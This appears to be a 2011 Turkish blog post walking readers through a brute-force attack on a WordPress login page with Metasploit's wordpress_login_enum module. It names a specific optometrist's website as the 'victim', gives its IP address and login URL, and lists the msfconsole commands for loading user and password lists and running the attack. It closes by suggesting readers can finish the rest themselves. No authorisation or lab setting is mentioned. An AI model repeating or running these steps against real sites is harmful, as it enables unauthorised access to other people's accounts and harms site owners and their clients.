20 Aralık 2011 Salı

Wordpress Brute Force And Metasploit Show : ) // Th4.

Konu Wordpress Sitelerine Brute Force Yöntemiyle User ve Pass Bulma : )

Exploit : auxiliary/scanner/http/wordpress_login_enum

Kullanıcağımız Araçlar.

Pass list
User list
BackTrack.

Victim : Neovision ~ Optometrists Durbanville

Vİctim İp : 196.41.137.143

Hemen başlıyalım.

İlk önce tmp dizine pass list ve user list dosyalarını txt olucak şekilde atıyoruz.
Tmp Dizinene Ulaşmak İçin ==>> Places >> Computer >> File System >> tmp
Buraya user.txt ve pass.txt dosyalarını atıyoruz.



Şİmdi Terminal'i açıp msfconsole yazıyoruz. biraz gec acılabilir bekleyin.

msf > Bunu gördükten sonra ise ,


msf > use auxiliary/scanner/http/wordpress_login_enum Diyoruz.


Ardından siteye baglanıcaz http://www.neovisi on.co.za/wp-login.php şeklinde.

O yüzden;
set URI http://www.neovisi on.co.za/wp-login.php diyoruz.



Şimdi pass ve user dosyalarını belirticez bunu için;


set USER_FILE /tmp/user.txt
set PASS_FILE /tmp/pass.txt





Sitenin ip adresini yazacaksınız.

ip'iyi yazıyoruz set RHOSTS 196.41.137.143 Ardındanda run diyoruz.




Şimdi o koyduğunuz user list doğrultusunda çalışacak.



ve pass.txt tuttugunda size böyle vericektir.





SAnırım Geri Kalanını Yaparsınız : )

Hayat BAckTrack'le Güzel : )

Th4 MasK

Bilinmezlik Diyarından.

Hiç yorum yok:

Yorum Gönder